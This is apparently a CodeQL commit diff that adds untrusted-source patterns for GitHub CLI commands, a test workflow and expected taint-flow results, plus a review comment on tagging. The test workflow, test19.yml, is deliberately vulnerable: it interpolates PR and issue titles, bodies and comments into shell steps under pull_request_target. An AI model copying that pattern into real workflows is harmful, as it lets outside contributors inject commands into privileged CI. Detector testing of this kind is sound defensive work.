+ - ["gh\\s+issue\\b.*\\bview\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body,assignees --jq .body)
+ - ["gh\\s+issue\\b.*\\bview\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')
+ - ["gh\\s+issue\\b.*\\bview\\b.*\\.comments.*", "text,multiline"]
+ #
+ # API
+ #
+ # PR="$(gh api /repos/test/test/pulls/${PR_NUMBER})"
+ #
+ # HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1)
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.head.ref.*", "branch,oneline"]
+ # TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/comments\\b.*\\.body.*", "text,multiline"]
+ # CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,oneline"]
+ # AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.user\\.login.*", "username,oneline"]
+ #
+ # ISSUES
+ #
+ # TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*/comments\\b.*\\.body.*", "text,multiline"]
+
diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_command.yml
similarity index 96%
rename from ql/lib/ext/config/untrusted_git_commands.yml
rename to ql/lib/ext/config/untrusted_git_command.yml
index b4b96a4af43..e862267027a 100644
--- a/ql/lib/ext/config/untrusted_git_commands.yml
+++ b/ql/lib/ext/config/untrusted_git_command.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: github/actions-all - extensible: untrustedGitCommandsDataModel + extensible: untrustedGitCommandDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"]
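Review bot: The row for `/pulls.*/files` is tagged `filename,oneline`, while the equivalent `gh pr view … .files` row is tagged `filename,multiline`. `--jq '.[].filename'` prints one path per line, so the API row should presumably read `- ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,multiline"]`. If the second half of the flag decides how downstream queries treat newlines in the tainted value, the `oneline` tag would under-report flows from this command. Separately, the example comment above the last `issues.*/comments` row calls `/repos/test/test/pulls/${PR_NUMBER}/comments`, and the `issues2` comments step in test19.yml uses the same pulls path. The issues-comments pattern is therefore neither illustrated nor exercised by the test, and both places should use an `/issues/<number>/comments` path.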
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml new file mode 100644 index 00000000000..804d55a7db2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml 
@@ -0,0 +1,112 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ pulls1:
+ runs-on: ubuntu-latest
+ steps:
+ - id: head_ref
+ run: |
+ HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')
+ echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.head_ref.outputs.head_ref}}"
+ - id: title
+ run: |
+ TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh pr view $PR_NUMBER --json body --jq .body)
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+ - id: files
+ run: |
+ CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"
+ echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.files.outputs.files}}"
+ - id: author
+ run: |
+ AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login')
+ echo "author=$AUTHOR" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.author.outputs.author}}"
+ pulls2:
+ runs-on: ubuntu-latest
+ steps:
+ - id: head_ref
+ run: |
+ HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1)
+ echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.head_ref.outputs.head_ref}}"
+ - id: title
+ run: |
+ TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+ - id: files
+ run: |
+ CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')
+ echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.files.outputs.files}}"
+ - id: author
+ run: |
+ AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")
+ echo "author=$AUTHOR" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.author.outputs.author}}"
+ issues1:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+ issues2:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 83faf4eb5e4..8a134a6f7ef 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} 
"$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| 
.github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | 
.github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api 
/repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref 
[head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq 
'.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R 
${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
